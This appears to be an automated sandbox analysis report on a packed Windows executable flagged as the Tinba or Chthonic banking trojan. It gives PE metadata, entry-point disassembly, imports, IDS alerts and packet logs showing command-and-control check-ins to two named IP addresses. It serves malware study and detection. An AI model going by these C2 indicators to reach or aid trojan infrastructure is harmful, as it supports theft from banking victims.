File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}$...w...w...w..nw...w..~w...w..hw...w...w...w..}w...w..ow...w..kw...wRich...w........PE..L......T...........................
Icon Hash: 888c8e8eaa868fc6
Entrypoint: 0x405a80
Entrypoint Section: UPX0
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows cui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics: NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x549EEEEC [Sat Dec 27 17:39:56 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: d39aa71a62356d5bd05b3ccf2dfedd9e
Instruction (disassembly at entrypoint)
push ebp
mov ebp, esp
push ebx
push esi
sub esp, 38h
mov dword ptr [ebp-10h], 00000000h
mov eax, dword ptr [ebp-10h]
mov dword ptr [ebp-2Ch], 00000001h
mov ecx, dword ptr [ebp-2Ch]
mov dword ptr [ebp-20h], 00000000h
mov word ptr [ebp-22h], 2D5Bh
mov edx, dword ptr [ebp-20h]
mov dword ptr [ebp-28h], 00000007h
mov esi, dword ptr [ebp-28h]
mov byte ptr [ebp-2Dh], 00000052h
mov bl, byte ptr [ebp-2Dh]
mov word ptr [ebp-30h], 796Dh
mov byte ptr [ebp-09h], bl
mov eax, dword ptr [ebp+00h]
mov dword ptr [0040DD44h], eax
lea eax, dword ptr [ebp+04h]
mov dword ptr [0040DD48h], eax
mov dword ptr [esp], esi
mov dword ptr [ebp-34h], eax
mov dword ptr [ebp-38h], ecx
mov dword ptr [ebp-3Ch], edx
call 00007F922D58E41Eh
mov ecx, dword ptr [ebp-3Ch]
cmp eax, ecx
je 00007F922D58E85Eh
mov ax, 0000h
mov cx, word ptr [ebp-30h]
mov dx, ax
sub dx, word ptr [ebp-30h]
mov word ptr [ebp-30h], dx
sub ax, word ptr [ebp-30h]
or cx, 1256h
mov word ptr [ebp-30h], cx
mov word ptr [ebp-22h], ax
mov esi, dword ptr [ebp-38h]
mov dword ptr [ebp-14h], esi
jmp 00007F922D58E844h
mov ax, 0000h
mov ecx, dword ptr [ebp-34h]
mov dword ptr [ebp-14h], ecx
sub ax, word ptr [ebp-22h]
mov word ptr [ebp-22h], ax
mov eax, dword ptr [ebp-14h]
mov cx, word ptr [ebp-22h]
and cx, 0673h
mov word ptr [ebp-22h], cx
add esp, 38h
pop esi
pop ebx
pop ebp
ret
add byte ptr [eax], al
Programming Language:
• [ASM] VS2005 build 50727
• [ C ] VS2005 build 50727
• [IMP] VS2005 build 50727
• [C++] VS2005 build 50727
• [RES] VS2005 build 50727
• [LNK] VS2005 build 50727
| Name | Virtual Address | Virtual Size | Is in Section |
| --- | --- | --- | --- |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1d000 | 0x8c | .imports |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1c000 | 0xd58 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| UPX0 | 0x1000 | 0x10000 | 0xf600 | False | 0.4557768038617886 | DOS executable (COM) | 4.895667733918766 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| UPX1 | 0x11000 | 0xb000 | 0xb000 | False | 0.3611505681818182 | data | 5.633049275866229 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x1c000 | 0x1000 | 0x1000 | False | 0.318359375 | data | 3.483060593097884 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .imports | 0x1d000 | 0x1000 | 0xc00 | False | 0.421875 | data | 4.436376811230836 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| --- | --- | --- | --- | --- | --- | --- |
| RT_ICON | 0x1c2fc | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 0 | | | 0.21890243902439024 |
| RT_ICON | 0x118a0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | | | 0.3400537634408602 |
| RT_ICON | 0x11b98 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 0 | | | 0.35450819672131145 |
| RT_ICON | 0x11d90 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | | | 0.46283783783783783 |
| RT_ICON | 0x11ec8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.5026652452025586 |
| RT_ICON | 0x12d80 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.5798736462093863 |
| RT_ICON | 0x13638 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | | | 0.40264976958525345 |
| RT_ICON | 0x13d10 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.3273121387283237 |
| RT_ICON | 0x14288 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.27344398340248965 |
| RT_ICON | 0x16840 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.37875234521575984 |
| RT_ICON | 0x178f8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | | | 0.37868852459016394 |
| RT_ICON | 0x18290 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.4796099290780142 |
| RT_GROUP_ICON | 0x1c968 | 0xae | data | | | 0.5919540229885057 |
| RT_VERSION | 0x1ca1c | 0x33c | data | | | 0.47342995169082125 |
| DLL | Import |
| --- | --- |
| GDI32.dll | GetDeviceCaps |
| KERNEL32.DLL | AddAtomW, FreeConsole, GetCurrencyFormatW, IsProcessorFeaturePresent, CreateEventA, OpenFileMappingW, LocalHandle, HeapSize, MulDiv, WriteFile, GetTempFileNameW, SetLocaleInfoW, DosDateTimeToFileTime, EnumLanguageGroupLocalesW, CreatePipe, GetPrivateProfileSectionNamesA, SetConsoleTitleA, CancelDeviceWakeupRequest, GetVolumePathNameA, GetProfileIntA, GetDateFormatA, DebugBreak, SuspendThread, SetCommMask, EnumUILanguagesW, MoveFileWithProgressA, BackupRead, GetNumberOfConsoleInputEvents, GetLongPathNameA, FreeLibrary, GetFileAttributesW, EnumDateFormatsA, QueryDosDeviceA, UpdateResourceW, WritePrivateProfileStructA, lstrcpynA, GetExitCodeProcess, GlobalAddAtomW, GetShortPathNameW, UnlockFileEx, SetComputerNameExA, GetExitCodeProcess |
| WINMM.dll | timeSetEvent, waveOutOpen, midiConnect, midiOutSetVolume, mmioOpenA, mmioWrite, DrvGetModuleHandle, mciGetDeviceIDFromElementIDW, waveOutGetErrorTextW, joyGetPosEx, mixerSetControlDetails, joySetThreshold, mmioRead, waveOutGetDevCapsA, DefDriverProc, mmioDescend, mixerGetLineInfoA, mciSendStringA, midiOutClose, midiInGetDevCapsW, midiStreamOut, mmioSetBuffer, midiInClose, waveOutReset, midiOutPrepareHeader, waveInGetPosition, GetDriverModuleHandle, mmioGetInfo, midiInMessage, mciGetCreatorTask, auxGetVolume, joyGetDevCapsW, waveInGetErrorTextA, mixerGetLineControlsW |
| mscms.dll | GetColorProfileElement, UninstallColorProfileA, AssociateColorProfileWithDeviceA, EnumColorProfilesW, GetStandardColorSpaceProfileW, DisassociateColorProfileFromDeviceW, GetStandardColorSpaceProfileA, SetStandardColorSpaceProfileW, DeleteColorTransform, GetPS2ColorRenderingIntent, SetColorProfileHeader, TranslateBitmapBits, CreateColorTransformA, ConvertIndexToColorName, CreateProfileFromLogColorSpaceW, RegisterCMMW, GetColorProfileElementTag, GetColorProfileFromHandle, UninstallColorProfileW, CreateMultiProfileTransform, GetCountColorProfileElements, InstallColorProfileA, CreateColorTransformW, CheckColors, SetColorProfileElementReference |
| msvcrt.dll | iswprint, _wgetenv, srand, strtok, iswupper, tolower, fputs, _swab, wcsncpy, _fputchar, iswctype, _strupr, bsearch, _strnicmp, memcmp, _wspawnl, _abnormal_termination, _rotl, _flsbuf, isdigit, memmove, _isctype, isalpha, isgraph, _wspawnvpe, _wexecve, _wcslwr, _wcsrev, fputwc, _fcvt, _ultoa, tmpnam, _wcreat |
| ole32.dll | OleCreateFromData, HWND_UserMarshal, CreateAntiMoniker, CoInitialize, CoSetProxyBlanket, CoDisconnectObject, ReleaseStgMedium, HGLOBAL_UserSize, PropStgNameToFmtId |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
12/22/23-21:31:45.756024 | TCP | 2020418 | ET TROJAN Tinba Checkin 2 | 49742 | 80 | 192.168.2.4 | 216.218.185.162
12/22/23-21:31:50.428588 | TCP | 2830613 | ETPRO TROJAN W32/Chthonic CnC Activity | 49745 | 80 | 192.168.2.4 | 216.218.185.162
12/22/23-21:31:53.740170 | TCP | 2830613 | ETPRO TROJAN W32/Chthonic CnC Activity | 49748 | 80 | 192.168.2.4 | 216.218.185.162
12/22/23-21:31:50.428588 | TCP | 2020418 | ET TROJAN Tinba Checkin 2 | 49745 | 80 | 192.168.2.4 | 216.218.185.162
12/22/23-21:31:50.428588 | TCP | 2024659 | ET TROJAN [PTsecurity] Tinba Checkin 4 | 49745 | 80 | 192.168.2.4 | 216.218.185.162
12/22/23-21:31:41.115704 | TCP | 2020418 | ET TROJAN Tinba Checkin 2 | 49739 | 80 | 192.168.2.4 | 216.218.185.162
12/22/23-21:31:41.115704 | TCP | 2024659 | ET TROJAN [PTsecurity] Tinba Checkin 4 | 49739 | 80 | 192.168.2.4 | 216.218.185.162
12/22/23-21:31:53.740170 | TCP | 2024659 | ET TROJAN [PTsecurity] Tinba Checkin 4 | 49748 | 80 | 192.168.2.4 | 216.218.185.162
12/22/23-21:31:53.740170 | TCP | 2020418 | ET TROJAN Tinba Checkin 2 | 49748 | 80 | 192.168.2.4 | 216.218.185.162
12/22/23-21:31:38.006819 | TCP | 2020418 | ET TROJAN Tinba Checkin 2 | 49737 | 80 | 192.168.2.4 | 216.218.185.162
12/22/23-21:31:52.053475 | TCP | 2024659 | ET TROJAN [PTsecurity] Tinba Checkin 4 | 49746 | 80 | 192.168.2.4 | 216.218.185.162
12/22/23-21:31:42.585880 | TCP | 2024659 | ET TROJAN [PTsecurity] Tinba Checkin 4 | 49740 | 80 | 192.168.2.4 | 216.218.185.162
12/22/23-21:31:47.490220 | TCP | 2024659 | ET TROJAN [PTsecurity] Tinba Checkin 4 | 49743 | 80 | 192.168.2.4 | 216.218.185.162
12/22/23-21:31:44.432614 | TCP | 2020418 | ET TROJAN Tinba Checkin 2 | 49741 | 80 | 192.168.2.4 | 216.218.185.162
12/22/23-21:31:47.490220 | TCP | 2020418 | ET TROJAN Tinba Checkin 2 | 49743 | 80 | 192.168.2.4 | 216.218.185.162
12/22/23-21:31:35.805907 | TCP | 2024659 | ET TROJAN [PTsecurity] Tinba Checkin 4 | 49736 | 80 | 192.168.2.4 | 45.77.249.79
12/22/23-21:31:35.805907 | TCP | 2020418 | ET TROJAN Tinba Checkin 2 | 49736 | 80 | 192.168.2.4 | 45.77.249.79
12/22/23-21:31:41.115704 | TCP | 2830613 | ETPRO TROJAN W32/Chthonic CnC Activity | 49739 | 80 | 192.168.2.4 | 216.218.185.162
12/22/23-21:31:38.006819 | TCP | 2024659 | ET TROJAN [PTsecurity] Tinba Checkin 4 | 49737 | 80 | 192.168.2.4 | 216.218.185.162
12/22/23-21:31:52.053475 | TCP | 2020418 | ET TROJAN Tinba Checkin 2 | 49746 | 80 | 192.168.2.4 | 216.218.185.162
12/22/23-21:31:39.602700 | TCP | 2024659 | ET TROJAN [PTsecurity] Tinba Checkin 4 | 49738 | 80 | 192.168.2.4 | 216.218.185.162
12/22/23-21:31:47.490220 | TCP | 2830613 | ETPRO TROJAN W32/Chthonic CnC Activity | 49743 | 80 | 192.168.2.4 | 216.218.185.162
12/22/23-21:31:39.602700 | TCP | 2020418 | ET TROJAN Tinba Checkin 2 | 49738 | 80 | 192.168.2.4 | 216.218.185.162
12/22/23-21:31:48.965379 | TCP | 2024659 | ET TROJAN [PTsecurity] Tinba Checkin 4 | 49744 | 80 | 192.168.2.4 | 216.218.185.162
12/22/23-21:31:44.432614 | TCP | 2024659 | ET TROJAN [PTsecurity] Tinba Checkin 4 | 49741 | 80 | 192.168.2.4 | 216.218.185.162
12/22/23-21:31:19.712756 | TCP | 2020418 | ET TROJAN Tinba Checkin 2 | 49735 | 80 | 192.168.2.4 | 216.218.185.162
12/22/23-21:31:42.585880 | TCP | 2020418 | ET TROJAN Tinba Checkin 2 | 49740 | 80 | 192.168.2.4 | 216.218.185.162
12/22/23-21:31:19.712756 | TCP | 2024659 | ET TROJAN [PTsecurity] Tinba Checkin 4 | 49735 | 80 | 192.168.2.4 | 216.218.185.162
12/22/23-21:31:48.965379 | TCP | 2020418 | ET TROJAN Tinba Checkin 2 | 49744 | 80 | 192.168.2.4 | 216.218.185.162
12/22/23-21:31:38.006819 | TCP | 2830613 | ETPRO TROJAN W32/Chthonic CnC Activity | 49737 | 80 | 192.168.2.4 | 216.218.185.162
12/22/23-21:31:35.805907 | TCP | 2830613 | ETPRO TROJAN W32/Chthonic CnC Activity | 49736 | 80 | 192.168.2.4 | 45.77.249.79
12/22/23-21:31:45.756024 | TCP | 2024659 | ET TROJAN [PTsecurity] Tinba Checkin 4 | 49742 | 80 | 192.168.2.4 | 216.218.185.162
12/22/23-21:31:44.432614 | TCP | 2830613 | ETPRO TROJAN W32/Chthonic CnC Activity | 49741 | 80 | 192.168.2.4 | 216.218.185.162
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 22, 2023 21:30:50.759562016 CET | 49675 | 443 | 192.168.2.4 | 173.222.162.32
Dec 22, 2023 21:31:00.366753101 CET | 49675 | 443 | 192.168.2.4 | 173.222.162.32
Dec 22, 2023 21:31:11.238784075 CET | 49672 | 443 | 192.168.2.4 | 173.222.162.32
Dec 22, 2023 21:31:11.239866018 CET | 49729 | 443 | 192.168.2.4 | 173.222.162.32
Dec 22, 2023 21:31:11.239916086 CET | 443 | 49729 | 173.222.162.32 | 192.168.2.4
Dec 22, 2023 21:31:11.239984035 CET | 49729 | 443 | 192.168.2.4 | 173.222.162.32
Dec 22, 2023 21:31:11.241337061 CET | 49729 | 443 | 192.168.2.4 | 173.222.162.32
Dec 22, 2023 21:31:11.241358995 CET | 443 | 49729 | 173.222.162.32 | 192.168.2.4
Dec 22, 2023 21:31:11.538502932 CET | 49672 | 443 | 192.168.2.4 | 173.222.162.32
Dec 22, 2023 21:31:11.671864986 CET | 443 | 49729 | 173.222.162.32 | 192.168.2.4
Dec 22, 2023 21:31:11.671931982 CET | 49729 | 443 | 192.168.2.4 | 173.222.162.32
Dec 22, 2023 21:31:12.147861958 CET | 49672 | 443 | 192.168.2.4 | 173.222.162.32
Dec 22, 2023 21:31:12.761574030 CET | 49729 | 443 | 192.168.2.4 | 173.222.162.32
Dec 22, 2023 21:31:12.761614084 CET | 443 | 49729 | 173.222.162.32 | 192.168.2.4
Dec 22, 2023 21:31:12.761971951 CET | 443 | 49729 | 173.222.162.32 | 192.168.2.4
Dec 22, 2023 21:31:12.762032032 CET | 49729 | 443 | 192.168.2.4 | 173.222.162.32
Dec 22, 2023 21:31:12.762510061 CET | 49729 | 443 | 192.168.2.4 | 173.222.162.32
Dec 22, 2023 21:31:12.762540102 CET | 443 | 49729 | 173.222.162.32 | 192.168.2.4
Dec 22, 2023 21:31:12.838124990 CET | 49729 | 443 | 192.168.2.4 | 173.222.162.32
Dec 22, 2023 21:31:12.838150978 CET | 443 | 49729 | 173.222.162.32 | 192.168.2.4
Dec 22, 2023 21:31:13.267890930 CET | 443 | 49729 | 173.222.162.32 | 192.168.2.4
Dec 22, 2023 21:31:13.268115044 CET | 49729 | 443 | 192.168.2.4 | 173.222.162.32
Dec 22, 2023 21:31:13.268309116 CET | 443 | 49729 | 173.222.162.32 | 192.168.2.4
Dec 22, 2023 21:31:13.268316031 CET | 49729 | 443 | 192.168.2.4 | 173.222.162.32
Dec 22, 2023 21:31:13.268342972 CET | 49729 | 443 | 192.168.2.4 | 173.222.162.32
Dec 22, 2023 21:31:13.268362999 CET | 443 | 49729 | 173.222.162.32 | 192.168.2.4
Dec 22, 2023 21:31:13.268387079 CET | 49729 | 443 | 192.168.2.4 | 173.222.162.32
Dec 22, 2023 21:31:13.268403053 CET | 49729 | 443 | 192.168.2.4 | 173.222.162.32
Dec 22, 2023 21:31:13.351030111 CET | 49672 | 443 | 192.168.2.4 | 173.222.162.32
Dec 22, 2023 21:31:15.757338047 CET | 49672 | 443 | 192.168.2.4 | 173.222.162.32
Dec 22, 2023 21:31:18.595140934 CET | 49735 | 80 | 192.168.2.4 | 216.218.185.162
Dec 22, 2023 21:31:18.796396971 CET | 80 | 49735 | 216.218.185.162 | 192.168.2.4
Dec 22, 2023 21:31:18.796514988 CET | 49735 | 80 | 192.168.2.4 | 216.218.185.162
Dec 22, 2023 21:31:19.712755919 CET | 49735 | 80 | 192.168.2.4 | 216.218.185.162
Dec 22, 2023 21:31:19.914051056 CET | 80 | 49735 | 216.218.185.162 | 192.168.2.4
Dec 22, 2023 21:31:19.914130926 CET | 49735 | 80 | 192.168.2.4 | 216.218.185.162
Dec 22, 2023 21:31:20.115340948 CET | 80 | 49735 | 216.218.185.162 | 192.168.2.4
Dec 22, 2023 21:31:20.115583897 CET | 80 | 49735 | 216.218.185.162 | 192.168.2.4
Dec 22, 2023 21:31:20.115699053 CET | 80 | 49735 | 216.218.185.162 | 192.168.2.4
Dec 22, 2023 21:31:20.115786076 CET | 49735 | 80 | 192.168.2.4 | 216.218.185.162
Dec 22, 2023 21:31:20.569731951 CET | 49672 | 443 | 192.168.2.4 | 173.222.162.32
Dec 22, 2023 21:31:20.779464960 CET | 49735 | 80 | 192.168.2.4 | 216.218.185.162
Dec 22, 2023 21:31:20.980840921 CET | 80 | 49735 | 216.218.185.162 | 192.168.2.4
Dec 22, 2023 21:31:30.179114103 CET | 49672 | 443 | 192.168.2.4 | 173.222.162.32
Dec 22, 2023 21:31:35.436757088 CET | 49736 | 80 | 192.168.2.4 | 45.77.249.79
Dec 22, 2023 21:31:35.802743912 CET | 80 | 49736 | 45.77.249.79 | 192.168.2.4
Dec 22, 2023 21:31:35.803150892 CET | 49736 | 80 | 192.168.2.4 | 45.77.249.79
Dec 22, 2023 21:31:35.805907011 CET | 49736 | 80 | 192.168.2.4 | 45.77.249.79
Dec 22, 2023 21:31:36.169893026 CET | 80 | 49736 | 45.77.249.79 | 192.168.2.4
Dec 22, 2023 21:31:36.170080900 CET | 49736 | 80 | 192.168.2.4 | 45.77.249.79
Dec 22, 2023 21:31:36.534226894 CET | 80 | 49736 | 45.77.249.79 | 192.168.2.4
Dec 22, 2023 21:31:36.754365921 CET | 80 | 49736 | 45.77.249.79 | 192.168.2.4
Dec 22, 2023 21:31:36.754401922 CET | 80 | 49736 | 45.77.249.79 | 192.168.2.4
Dec 22, 2023 21:31:36.755017996 CET | 49736 | 80 | 192.168.2.4 | 45.77.249.79
Dec 22, 2023 21:31:36.755017996 CET | 49736 | 80 | 192.168.2.4 | 45.77.249.79
Dec 22, 2023 21:31:37.119350910 CET | 80 | 49736 | 45.77.249.79 | 192.168.2.4
Dec 22, 2023 21:31:37.804647923 CET | 49737 | 80 | 192.168.2.4 | 216.218.185.162
Dec 22, 2023 21:31:38.006325960 CET | 80 | 49737 | 216.218.185.162 | 192.168.2.4
Dec 22, 2023 21:31:38.006567955 CET | 49737 | 80 | 192.168.2.4 | 216.218.185.162
Dec 22, 2023 21:31:38.006819010 CET | 49737 | 80 | 192.168.2.4 | 216.218.185.162
Dec 22, 2023 21:31:38.208348989 CET | 80 | 49737 | 216.218.185.162 | 192.168.2.4
Dec 22, 2023 21:31:38.208678007 CET | 49737 | 80 | 192.168.2.4 | 216.218.185.162
Dec 22, 2023 21:31:38.416351080 CET | 80 | 49737 | 216.218.185.162 | 192.168.2.4
Dec 22, 2023 21:31:38.416371107 CET | 80 | 49737 | 216.218.185.162 | 192.168.2.4
Dec 22, 2023 21:31:38.416402102 CET | 80 | 49737 | 216.218.185.162 | 192.168.2.4
Dec 22, 2023 21:31:38.416735888 CET | 49737 | 80 | 192.168.2.4 | 216.218.185.162
Dec 22, 2023 21:31:38.416865110 CET | 49737 | 80 | 192.168.2.4 | 216.218.185.162
Dec 22, 2023 21:31:38.619069099 CET | 80 | 49737 | 216.218.185.162 | 192.168.2.4
Dec 22, 2023 21:31:39.398689985 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Dec 22, 2023 21:31:39.602485895 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Dec 22, 2023 21:31:39.602567911 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Dec 22, 2023 21:31:39.602699995 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Dec 22, 2023 21:31:39.807838917 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Dec 22, 2023 21:31:39.807910919 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Dec 22, 2023 21:31:40.013670921 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Dec 22, 2023 21:31:40.013947964 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Dec 22, 2023 21:31:40.013961077 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Dec 22, 2023 21:31:40.014209032 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Dec 22, 2023 21:31:40.016026974 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Dec 22, 2023 21:31:40.218029022 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Dec 22, 2023 21:31:40.914036036 CET | 49739 | 80 | 192.168.2.4 | 216.218.185.162
Dec 22, 2023 21:31:41.115379095 CET | 80 | 49739 | 216.218.185.162 | 192.168.2.4
Dec 22, 2023 21:31:41.115467072 CET | 49739 | 80 | 192.168.2.4 | 216.218.185.162
Dec 22, 2023 21:31:41.115704060 CET | 49739 | 80 | 192.168.2.4 | 216.218.185.162
Dec 22, 2023 21:31:41.316739082 CET | 80 | 49739 | 216.218.185.162 | 192.168.2.4
Dec 22, 2023 21:31:41.316890955 CET | 49739 | 80 | 192.168.2.4 | 216.218.185.162
Dec 22, 2023 21:31:41.518258095 CET | 80 | 49739 | 216.218.185.162 | 192.168.2.4
Dec 22, 2023 21:31:41.519004107 CET | 80 | 49739 | 216.218.185.162 | 192.168.2.4
Dec 22, 2023 21:31:41.519038916 CET | 80 | 49739 | 216.218.185.162 | 192.168.2.4
Dec 22, 2023 21:31:41.519419909 CET | 49739 | 80 | 192.168.2.4 | 216.218.185.162
Dec 22, 2023 21:31:41.519617081 CET | 49739 | 80 | 192.168.2.4 | 216.218.185.162
Dec 22, 2023 21:31:41.726632118 CET | 80 | 49739 | 216.218.185.162 | 192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:42.383488894 CET4974080192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:42.585366964 CET8049740216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:42.585551023 CET4974080192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:42.585880041 CET4974080192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:42.787254095 CET8049740216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:42.787332058 CET4974080192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:42.988810062 CET8049740216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:42.989285946 CET8049740216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:42.989300013 CET8049740216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:42.989473104 CET4974080192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:42.989773035 CET4974080192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:43.191124916 CET8049740216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:44.230259895 CET4974180192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:44.432301998 CET8049741216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:44.432403088 CET4974180192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:44.432614088 CET4974180192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:44.637361050 CET8049741216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:44.637525082 CET4974180192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:44.839313984 CET8049741216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:44.839683056 CET8049741216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:44.839696884 CET8049741216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:44.839868069 CET4974180192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:44.840142965 CET4974180192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:45.041290998 CET8049741216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:45.554696083 CET4974280192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:45.755778074 CET8049742216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:45.755985022 CET4974280192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:45.756023884 CET4974280192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:45.958229065 CET8049742216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:45.958293915 CET4974280192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:46.159310102 CET8049742216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:46.159543037 CET8049742216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:46.159554958 CET8049742216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:46.160032034 CET4974280192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:46.160201073 CET4974280192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:46.363837004 CET8049742216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:47.289103985 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:47.489974022 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:47.490220070 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:47.490220070 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:47.691344023 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:47.691407919 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:47.892277956 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:47.892774105 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:47.892884970 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:47.893059969 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:47.893239021 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:48.093873978 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:48.757961035 CET4974480192.168.2.4216.218.185.162
